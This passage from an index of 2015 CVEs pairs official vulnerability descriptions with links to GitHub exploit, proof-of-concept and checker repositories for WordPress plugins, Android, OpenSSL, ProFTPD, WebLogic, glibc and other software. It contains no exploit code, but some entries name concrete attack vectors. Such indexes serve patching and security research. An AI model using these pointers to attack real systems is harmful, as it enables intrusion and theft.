Cross-site scripting (XSS) vulnerability in the WPML plugin before 3.1.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the target parameter in a reminder_popup action to the default URI.
- [weidongl74/cve-2015-2315-report](https://github.com/weidongl74/cve-2015-2315-report)
### CVE-2015-2546 (2015-09-09)
The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Elevation of Privilege Vulnerability," a different vulnerability than CVE-2015-2511, CVE-2015-2517, and CVE-2015-2518.
- [k0keoyo/CVE-2015-2546-Exploit](https://github.com/k0keoyo/CVE-2015-2546-Exploit)
### CVE-2015-2794 (2017-02-06)
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
- [styx00/DNN_CVE-2015-2794](https://github.com/styx00/DNN_CVE-2015-2794)
- [wilsc0w/CVE-2015-2794-finder](https://github.com/wilsc0w/CVE-2015-2794-finder)
### CVE-2015-2900 (2015-10-29)
The AddUserFinding add_userfinding2 function in Medicomp MEDCIN Engine before 2.22.20153.226 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted packet on port 8190.
- [securifera/CVE-2015-2900-Exploit](https://github.com/securifera/CVE-2015-2900-Exploit)
### CVE-2015-2925 (2015-11-16)
The prepend_path function in fs/dcache.c in the Linux kernel before 4.2.4 does not properly handle rename actions inside a bind mount, which allows local users to bypass an intended container protection mechanism by renaming a directory, related to a "double-chroot attack."
- [Kagami/docker_cve-2015-2925](https://github.com/Kagami/docker_cve-2015-2925)
### CVE-2015-3043 (2015-04-14)
Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in April 2015, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3042.
- [whitehairman/Exploit](https://github.com/whitehairman/Exploit)
### CVE-2015-3073 (2015-05-13)
Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X allow attackers to bypass intended restrictions on JavaScript API execution via unspecified vectors, a different vulnerability than CVE-2015-3060, CVE-2015-3061, CVE-2015-3062, CVE-2015-3063, CVE-2015-3064, CVE-2015-3065, CVE-2015-3066, CVE-2015-3067, CVE-2015-3068, CVE-2015-3069, CVE-2015-3071, CVE-2015-3072, and CVE-2015-3074.
- [reigningshells/CVE-2015-3073](https://github.com/reigningshells/CVE-2015-3073)
### CVE-2015-3090 (2015-05-13)
Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3078, CVE-2015-3089, and CVE-2015-3093.
- [Xattam1/Adobe-Flash-Exploits_17-18](https://github.com/Xattam1/Adobe-Flash-Exploits_17-18)
### CVE-2015-3145 (2015-04-24)
The sanitize_cookie_path function in cURL and libcurl 7.31.0 through 7.41.0 does not properly calculate an index, which allows remote attackers to cause a denial of service (out-of-bounds write and crash) or possibly have other unspecified impact via a cookie path containing only a double-quote character.
- [serz999/CVE-2015-3145](https://github.com/serz999/CVE-2015-3145)
### CVE-2015-3152 (2016-05-16)
Oracle MySQL before 5.7.3, Oracle MySQL Connector/C (aka libmysqlclient) before 6.1.3, and MariaDB before 5.5.44 use the --ssl option to mean that SSL is optional, which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, aka a "BACKRONYM" attack.
- [duo-labs/mysslstrip](https://github.com/duo-labs/mysslstrip)
### CVE-2015-3194 (2015-12-06)
crypto/rsa/rsa_ameth.c in OpenSSL 1.0.1 before 1.0.1q and 1.0.2 before 1.0.2e allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an RSA PSS ASN.1 signature that lacks a mask generation function parameter.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3194](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3194)
### CVE-2015-3195 (2015-12-06)
The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3195](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3195)
### CVE-2015-3197 (2016-02-15)
ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functions.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3197](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3197)
### CVE-2015-3224 (2015-07-26)
request.rb in Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request.
- [0x00-0x00/CVE-2015-3224](https://github.com/0x00-0x00/CVE-2015-3224)
- [0xEval/cve-2015-3224](https://github.com/0xEval/cve-2015-3224)
- [n000xy/CVE-2015-3224-](https://github.com/n000xy/CVE-2015-3224-)
### CVE-2015-3306 (2015-05-18)
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
- [shk0x/cpx_proftpd](https://github.com/shk0x/cpx_proftpd)
- [nootropics/propane](https://github.com/nootropics/propane)
- [t0kx/exploit-CVE-2015-3306](https://github.com/t0kx/exploit-CVE-2015-3306)
- [davidtavarez/CVE-2015-3306](https://github.com/davidtavarez/CVE-2015-3306)
- [cved-sources/cve-2015-3306](https://github.com/cved-sources/cve-2015-3306)
- [hackarada/cve-2015-3306](https://github.com/hackarada/cve-2015-3306)
- [cdedmondson/Modified-CVE-2015-3306-Exploit](https://github.com/cdedmondson/Modified-CVE-2015-3306-Exploit)
- [cd6629/CVE-2015-3306-Python-PoC](https://github.com/cd6629/CVE-2015-3306-Python-PoC)
- [0xm4ud/ProFTPD_CVE-2015-3306](https://github.com/0xm4ud/ProFTPD_CVE-2015-3306)
- [jptr218/proftpd_bypass](https://github.com/jptr218/proftpd_bypass)
- [JoseLRC97/ProFTPd-1.3.5-mod_copy-Remote-Command-Execution](https://github.com/JoseLRC97/ProFTPd-1.3.5-mod_copy-Remote-Command-Execution)
### CVE-2015-3337 (2015-05-01)
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
- [jas502n/CVE-2015-3337](https://github.com/jas502n/CVE-2015-3337)
### CVE-2015-3456 (2015-05-13)
The Floppy Disk Controller (FDC) in QEMU, as used in Xen 4.5.x and earlier and KVM, allows local guest users to cause a denial of service (out-of-bounds write and guest crash) or possibly execute arbitrary code via the (1) FD_CMD_READ_ID, (2) FD_CMD_DRIVE_SPECIFICATION_COMMAND, or other unspecified commands, aka VENOM.
- [vincentbernat/cve-2015-3456](https://github.com/vincentbernat/cve-2015-3456)
- [orf53975/poisonfrog](https://github.com/orf53975/poisonfrog)
### CVE-2015-3636 (2015-08-06)
The ping_unhash function in net/ipv4/ping.c in the Linux kernel before 4.0.3 does not initialize a certain list data structure during an unhash operation, which allows local users to gain privileges or cause a denial of service (use-after-free and system crash) by leveraging the ability to make a SOCK_DGRAM socket system call for the IPPROTO_ICMP or IPPROTO_ICMPV6 protocol, and then making a connect system call after a disconnect.
- [betalphafai/cve-2015-3636_crash](https://github.com/betalphafai/cve-2015-3636_crash)
- [askk/libping_unhash_exploit_POC](https://github.com/askk/libping_unhash_exploit_POC)
- [ludongxu/cve-2015-3636](https://github.com/ludongxu/cve-2015-3636)
- [fi01/CVE-2015-3636](https://github.com/fi01/CVE-2015-3636)
- [android-rooting-tools/libpingpong_exploit](https://github.com/android-rooting-tools/libpingpong_exploit)
- [debugfan/rattle_root](https://github.com/debugfan/rattle_root)
- [a7vinx/CVE-2015-3636](https://github.com/a7vinx/CVE-2015-3636)
### CVE-2015-3825
- [roeeh/conscryptchecker](https://github.com/roeeh/conscryptchecker)
### CVE-2015-3837 (2015-10-01)
The OpenSSLX509Certificate class in org/conscrypt/OpenSSLX509Certificate.java in Android before 5.1.1 LMY48I improperly includes certain context data during serialization and deserialization, which allows attackers to execute arbitrary code via an application that sends a crafted Intent, aka internal bug 21437603.
- [itibs/IsildursBane](https://github.com/itibs/IsildursBane)
### CVE-2015-3839 (2017-08-07)
The updateMessageStatus function in Android 5.1.1 and earlier allows local users to cause a denial of service (NULL pointer exception and process crash).
- [mabin004/cve-2015-3839_PoC](https://github.com/mabin004/cve-2015-3839_PoC)
### CVE-2015-3864 (2015-10-01)
Integer underflow in the MPEG4Extractor::parseChunk function in MPEG4Extractor.cpp in libstagefright in mediaserver in Android before 5.1.1 LMY48M allows remote attackers to execute arbitrary code via crafted MPEG-4 data, aka internal bug 23034759. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-3824.
- [pwnaccelerator/stagefright-cve-2015-3864](https://github.com/pwnaccelerator/stagefright-cve-2015-3864)
- [eudemonics/scaredycat](https://github.com/eudemonics/scaredycat)
- [HenryVHuang/CVE-2015-3864](https://github.com/HenryVHuang/CVE-2015-3864)
- [Bhathiya404/Exploiting-Stagefright-Vulnerability-CVE-2015-3864](https://github.com/Bhathiya404/Exploiting-Stagefright-Vulnerability-CVE-2015-3864)
- [Cmadhushanka/CVE-2015-3864-Exploitation](https://github.com/Cmadhushanka/CVE-2015-3864-Exploitation)
### CVE-2015-4000 (2015-05-21)
The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.
- [fatlan/HAProxy-Keepalived-Sec-HighLoads](https://github.com/fatlan/HAProxy-Keepalived-Sec-HighLoads)
### CVE-2015-4495 (2015-08-08)
The PDF reader in Mozilla Firefox before 39.0.3, Firefox ESR 38.x before 38.1.1, and Firefox OS before 2.2 allows remote attackers to bypass the Same Origin Policy, and read arbitrary files or gain privileges, via vectors involving crafted JavaScript code and a native setter, as exploited in the wild in August 2015.
- [vincd/CVE-2015-4495](https://github.com/vincd/CVE-2015-4495)
### CVE-2015-4843 (2015-10-21)
Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
- [Soteria-Research/cve-2015-4843-type-confusion-phrack](https://github.com/Soteria-Research/cve-2015-4843-type-confusion-phrack)
### CVE-2015-4852 (2015-11-18)
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.
- [roo7break/serialator](https://github.com/roo7break/serialator)
- [AndersonSingh/serialization-vulnerability-scanner](https://github.com/AndersonSingh/serialization-vulnerability-scanner)
- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln)
- [nex1less/CVE-2015-4852](https://github.com/nex1less/CVE-2015-4852)
### CVE-2015-4870 (2015-10-21)
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.
- [OsandaMalith/CVE-2015-4870](https://github.com/OsandaMalith/CVE-2015-4870)
### CVE-2015-5119 (2015-07-08)
Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
- [jvazquez-r7/CVE-2015-5119](https://github.com/jvazquez-r7/CVE-2015-5119)
- [CiscoCXSecurity/CVE-2015-5119_walkthrough](https://github.com/CiscoCXSecurity/CVE-2015-5119_walkthrough)
- [dangokyo/CVE-2015-5119](https://github.com/dangokyo/CVE-2015-5119)
### CVE-2015-5195 (2017-07-21)
ntp_openssl.m4 in ntpd in NTP before 4.2.7p112 allows remote attackers to cause a denial of service (segmentation fault) via a crafted statistics or filegen configuration command that is not enabled during compilation.
- [theglife214/CVE-2015-5195](https://github.com/theglife214/CVE-2015-5195)
### CVE-2015-5254 (2016-01-08)
Apache ActiveMQ 5.x before 5.13.0 does not restrict the classes that can be serialized in the broker, which allows remote attackers to execute arbitrary code via a crafted serialized Java Message Service (JMS) ObjectMessage object.
- [jas502n/CVE-2015-5254](https://github.com/jas502n/CVE-2015-5254)
- [Ma1Dong/ActiveMQ_CVE-2015-5254](https://github.com/Ma1Dong/ActiveMQ_CVE-2015-5254)
### CVE-2015-5347 (2016-04-12)
Cross-site scripting (XSS) vulnerability in the getWindowOpenJavaScript function in org.apache.wicket.extensions.ajax.markup.html.modal.ModalWindow in Apache Wicket 1.5.x before 1.5.15, 6.x before 6.22.0, and 7.x before 7.2.0 might allow remote attackers to inject arbitrary web script or HTML via a ModalWindow title.
- [alexanderkjall/wicker-cve-2015-5347](https://github.com/alexanderkjall/wicker-cve-2015-5347)
### CVE-2015-5374 (2015-07-18)
A vulnerability has been identified in Firmware variant PROFINET IO for EN100 Ethernet module : All versions < V1.04.01; Firmware variant Modbus TCP for EN100 Ethernet module : All versions < V1.11.00; Firmware variant DNP3 TCP for EN100 Ethernet module : All versions < V1.03; Firmware variant IEC 104 for EN100 Ethernet module : All versions < V1.21; EN100 Ethernet module included in SIPROTEC Merging Unit 6MU80 : All versions < 1.02.02. Specially crafted packets sent to port 50000/UDP could cause a denial-of-service of the affected device. A manual reboot may be required to recover the service of the device.
- [can/CVE-2015-5374-DoS-PoC](https://github.com/can/CVE-2015-5374-DoS-PoC)
### CVE-2015-5377 (2018-03-06)
Elasticsearch before 1.6.1 allows remote attackers to execute arbitrary code via unspecified vectors involving the transport protocol. NOTE: ZDI appears to claim that CVE-2015-3253 and CVE-2015-5377 are the same vulnerability
- [fi3ro/CVE-2015-5377](https://github.com/fi3ro/CVE-2015-5377)
### CVE-2015-5477 (2015-07-29)
named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.
- [robertdavidgraham/cve-2015-5477](https://github.com/robertdavidgraham/cve-2015-5477)
- [elceef/tkeypoc](https://github.com/elceef/tkeypoc)
- [hmlio/vaas-cve-2015-5477](https://github.com/hmlio/vaas-cve-2015-5477)
- [knqyf263/cve-2015-5477](https://github.com/knqyf263/cve-2015-5477)
- [ilanyu/cve-2015-5477](https://github.com/ilanyu/cve-2015-5477)
- [likekabin/ShareDoc_cve-2015-5477](https://github.com/likekabin/ShareDoc_cve-2015-5477)
- [xycloops123/TKEY-remote-DoS-vulnerability-exploit](https://github.com/xycloops123/TKEY-remote-DoS-vulnerability-exploit)
### CVE-2015-5531 (2015-08-17)
Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
- [xpgdgit/CVE-2015-5531](https://github.com/xpgdgit/CVE-2015-5531)
- [M0ge/CVE-2015-5531-POC](https://github.com/M0ge/CVE-2015-5531-POC)
### CVE-2015-5602 (2015-11-17)
sudoedit in Sudo before 1.8.15 allows local users to gain privileges via a symlink attack on a file whose full path is defined using multiple wildcards in /etc/sudoers, as demonstrated by "/home/*/*/file.txt."
- [t0kx/privesc-CVE-2015-5602](https://github.com/t0kx/privesc-CVE-2015-5602)
- [cved-sources/cve-2015-5602](https://github.com/cved-sources/cve-2015-5602)
### CVE-2015-5932 (2015-10-23)
The kernel in Apple OS X before 10.11.1 allows local users to gain privileges by leveraging an unspecified "type confusion" during Mach task processing.
- [jndok/tpwn-bis](https://github.com/jndok/tpwn-bis)
### CVE-2015-5995 (2015-12-31)
Mediabridge Medialink MWN-WAPR300N devices with firmware 5.07.50 and Tenda N3 Wireless N150 devices allow remote attackers to obtain administrative access via a certain admin substring in an HTTP Cookie header.
- [shaheemirza/TendaSpill](https://github.com/shaheemirza/TendaSpill)
### CVE-2015-6086 (2015-11-11)
Microsoft Internet Explorer 9 through 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."
- [payatu/CVE-2015-6086](https://github.com/payatu/CVE-2015-6086)
### CVE-2015-6095 (2015-11-11)
Kerberos in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 Gold and 1511 mishandles password changes, which allows physically proximate attackers to bypass authentication, and conduct decryption attacks against certain BitLocker configurations, by connecting to an unintended Key Distribution Center (KDC), aka "Windows Kerberos Security Feature Bypass."
- [JackOfMostTrades/bluebox](https://github.com/JackOfMostTrades/bluebox)
### CVE-2015-6132 (2015-12-09)
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 Gold and 1511 mishandle library loading, which allows local users to gain privileges via a crafted application, aka "Windows Library Loading Remote Code Execution Vulnerability."
- [hexx0r/CVE-2015-6132](https://github.com/hexx0r/CVE-2015-6132)
### CVE-2015-6357 (2015-11-18)
The rule-update feature in Cisco FireSIGHT Management Center (MC) 5.2 through 5.4.0.1 does not verify the X.509 certificate of the support.sourcefire.com SSL server, which allows man-in-the-middle attackers to spoof this server and provide an invalid package, and consequently execute arbitrary code, via a crafted certificate, aka Bug ID CSCuw06444.
- [mattimustang/firepwner](https://github.com/mattimustang/firepwner)
### CVE-2015-6576 (2017-10-02)
Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.
- [CallMeJonas/CVE-2015-6576](https://github.com/CallMeJonas/CVE-2015-6576)
### CVE-2015-6606 (2015-10-06)
The Secure Element Evaluation Kit (aka SEEK or SmartCard API) plugin in Android before 5.1.1 LMY48T allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 22301786.
- [michaelroland/omapi-cve-2015-6606-exploit](https://github.com/michaelroland/omapi-cve-2015-6606-exploit)
### CVE-2015-6612 (2015-11-03)
libmedia in Android before 5.1.1 LMY48X and 6.0 before 2015-11-01 allows attackers to gain privileges via a crafted application, aka internal bug 23540426.
- [secmob/CVE-2015-6612](https://github.com/secmob/CVE-2015-6612)
- [flankerhqd/cve-2015-6612poc-forM](https://github.com/flankerhqd/cve-2015-6612poc-forM)
### CVE-2015-6620 (2015-12-08)
libstagefright in Android before 5.1.1 LMY48Z and 6.0 before 2015-12-01 allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bugs 24123723 and 24445127.
- [flankerhqd/CVE-2015-6620-POC](https://github.com/flankerhqd/CVE-2015-6620-POC)
- [flankerhqd/mediacodecoob](https://github.com/flankerhqd/mediacodecoob)
### CVE-2015-6637 (2016-01-06)
The MediaTek misc-sd driver in Android before 5.1.1 LMY49F and 6.0 before 2016-01-01 allows attackers to gain privileges via a crafted application, aka internal bug 25307013.
- [betalphafai/CVE-2015-6637](https://github.com/betalphafai/CVE-2015-6637)
### CVE-2015-6639 (2016-01-06)
The Widevine QSEE TrustZone application in Android 5.x before 5.1.1 LMY49F and 6.0 before 2016-01-01 allows attackers to gain privileges via a crafted application that leverages QSEECOM access, aka internal bug 24446875.
- [laginimaineb/cve-2015-6639](https://github.com/laginimaineb/cve-2015-6639)
- [laginimaineb/ExtractKeyMaster](https://github.com/laginimaineb/ExtractKeyMaster)
### CVE-2015-6640 (2016-01-06)
The prctl_set_vma_anon_name function in kernel/sys.c in Android before 5.1.1 LMY49F and 6.0 before 2016-01-01 does not ensure that only one vma is accessed in a certain update action, which allows attackers to gain privileges or cause a denial of service (vma list corruption) via a crafted application, aka internal bug 20017123.
- [betalphafai/CVE-2015-6640](https://github.com/betalphafai/CVE-2015-6640)
### CVE-2015-6668 (2017-10-19)
The Job Manager plugin before 0.7.25 allows remote attackers to read arbitrary CV files via a brute force attack to the WordPress upload directory structure, related to an insecure direct object reference.
- [G01d3nW01f/CVE-2015-6668](https://github.com/G01d3nW01f/CVE-2015-6668)
- [h3xcr4ck3r/CVE-2015-6668](https://github.com/h3xcr4ck3r/CVE-2015-6668)
- [jimdiroffii/CVE-2015-6668](https://github.com/jimdiroffii/CVE-2015-6668)
### CVE-2015-6748 (2017-09-25)
Cross-site scripting (XSS) vulnerability in jsoup before 1.8.3.
- [epicosy/VUL4J-59](https://github.com/epicosy/VUL4J-59)
### CVE-2015-6835 (2016-05-16)
The session deserializer in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 mishandles multiple php_var_unserialize calls, which allow remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted session content.
- [ockeghem/CVE-2015-6835-checker](https://github.com/ockeghem/CVE-2015-6835-checker)
### CVE-2015-6967 (2015-09-16)
Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php.
- [dix0nym/CVE-2015-6967](https://github.com/dix0nym/CVE-2015-6967)
- [0xConstant/CVE-2015-6967](https://github.com/0xConstant/CVE-2015-6967)
- [FredBrave/CVE-2015-6967](https://github.com/FredBrave/CVE-2015-6967)
- [3mpir3Albert/HTB_Nibbles](https://github.com/3mpir3Albert/HTB_Nibbles)
### CVE-2015-7214 (2015-12-16)
Mozilla Firefox before 43.0 and Firefox ESR 38.x before 38.5 allow remote attackers to bypass the Same Origin Policy via data: and view-source: URIs.
- [llamakko/CVE-2015-7214](https://github.com/llamakko/CVE-2015-7214)
### CVE-2015-7297 (2015-10-29)
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.
- [CCrashBandicot/ContentHistory](https://github.com/CCrashBandicot/ContentHistory)
- [areaventuno/exploit-joomla](https://github.com/areaventuno/exploit-joomla)
- [Cappricio-Securities/CVE-2015-7297](https://github.com/Cappricio-Securities/CVE-2015-7297)
### CVE-2015-7501 (2017-11-09)
Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.
- [ianxtianxt/CVE-2015-7501](https://github.com/ianxtianxt/CVE-2015-7501)
### CVE-2015-7545 (2016-04-13)
The (1) git-remote-ext and (2) unspecified other remote helper programs in Git before 2.3.10, 2.4.x before 2.4.10, 2.5.x before 2.5.4, and 2.6.x before 2.6.1 do not properly restrict the allowed protocols, which might allow remote attackers to execute arbitrary code via a URL in a (a) .gitmodules file or (b) unknown other sources in a submodule.
- [avuserow/bug-free-chainsaw](https://github.com/avuserow/bug-free-chainsaw)
### CVE-2015-7547 (2016-02-18)
Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing "dual A/AAAA DNS queries" and the libnss_dns.so.2 NSS module.
- [fjserna/CVE-2015-7547](https://github.com/fjserna/CVE-2015-7547)
- [cakuzo/CVE-2015-7547](https://github.com/cakuzo/CVE-2015-7547)
- [t0r0t0r0/CVE-2015-7547](https://github.com/t0r0t0r0/CVE-2015-7547)
- [rexifiles/rex-sec-glibc](https://github.com/rexifiles/rex-sec-glibc)
- [babykillerblack/CVE-2015-7547](https://github.com/babykillerblack/CVE-2015-7547)
- [jgajek/cve-2015-7547](https://github.com/jgajek/cve-2015-7547)
- [eSentire/cve-2015-7547-public](https://github.com/eSentire/cve-2015-7547-public)
- [bluebluelan/CVE-2015-7547-proj-master](https://github.com/bluebluelan/CVE-2015-7547-proj-master)
- [miracle03/CVE-2015-7547-master](https://github.com/miracle03/CVE-2015-7547-master)
- [Stick-U235/CVE-2015-7547-Research](https://github.com/Stick-U235/CVE-2015-7547-Research)
- [Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547](https://github.com/Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547)
### CVE-2015-7755 (2015-12-19)
Juniper ScreenOS 6.2.0r15 through 6.2.0r18, 6.3.0r12 before 6.3.0r12b, 6.3.0r13 before 6.3.0r13b, 6.3.0r14 before 6.3.0r14b, 6.3.0r15 before 6.3.0r15b, 6.3.0r16 before 6.3.0r16b, 6.3.0r17 before 6.3.0r17b, 6.3.0r18 before 6.3.0r18b, 6.3.0r19 before 6.3.0r19b, and 6.3.0r20 before 6.3.0r21 allows remote attackers to obtain administrative access by entering an unspecified password during a (1) SSH or (2) TELNET session.
- [hdm/juniper-cve-2015-7755](https://github.com/hdm/juniper-cve-2015-7755)
- [cinno/CVE-2015-7755-POC](https://github.com/cinno/CVE-2015-7755-POC)
### CVE-2015-7808 (2015-11-24)
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.
- [Prajithp/CVE-2015-7808](https://github.com/Prajithp/CVE-2015-7808)
### CVE-2015-8088 (2016-01-12)
Heap-based buffer overflow in the HIFI driver in Huawei Mate 7 phones with software MT7-UL00 before MT7-UL00C17B354, MT7-TL10 before MT7-TL10C00B354, MT7-TL00 before MT7-TL00C01B354, and MT7-CL00 before MT7-CL00C92B354 and P8 phones with software GRA-TL00 before GRA-TL00C01B220SP01, GRA-CL00 before GRA-CL00C92B220, GRA-CL10 before GRA-CL10C92B220, GRA-UL00 before GRA-UL00C00B220, and GRA-UL10 before GRA-UL10C00B220 allows attackers to cause a denial of service (reboot) or execute arbitrary code via a crafted application.
- [Pray3r/CVE-2015-8088](https://github.com/Pray3r/CVE-2015-8088)
### CVE-2015-8103 (2015-11-25)
The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to execute arbitrary code via a crafted serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the "Groovy variant in 'ysoserial'".
- [cved-sources/cve-2015-8103](https://github.com/cved-sources/cve-2015-8103)
- [r00t4dm/Jenkins-CVE-2015-8103](https://github.com/r00t4dm/Jenkins-CVE-2015-8103)
### CVE-2015-8239 (2017-10-10)
The SHA-2 digest support in the sudoers plugin in sudo after 1.8.7 allows local users with write permissions to parts of the called command to replace them before it is executed.
- [justinsteven/sudo_digest_toctou_poc_CVE-2015-8239](https://github.com/justinsteven/sudo_digest_toctou_poc_CVE-2015-8239)
### CVE-2015-8277 (2016-02-24)
Multiple buffer overflows in (1) lmgrd and (2) Vendor Daemon in Flexera FlexNet Publisher before 11.13.1.2 Security Update 1 allow remote attackers to execute arbitrary code via a crafted packet with opcode (a) 0x107 or (b) 0x10a.
- [securifera/CVE-2015-8277-Exploit](https://github.com/securifera/CVE-2015-8277-Exploit)
### CVE-2015-8299 (2017-08-29)
Buffer overflow in the Group messages monitor (Falcon) in KNX ETS 4.1.5 (Build 3246) allows remote attackers to execute arbitrary code via a crafted KNXnet/IP UDP packet.
- [kernoelpanic/CVE-2015-8299](https://github.com/kernoelpanic/CVE-2015-8299)
### CVE-2015-8351 (2017-09-11)
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.
- [G01d3nW01f/CVE-2015-8351](https://github.com/G01d3nW01f/CVE-2015-8351)
- [G4sp4rCS/exploit-CVE-2015-8351](https://github.com/G4sp4rCS/exploit-CVE-2015-8351)
### CVE-2015-8543 (2015-12-28)
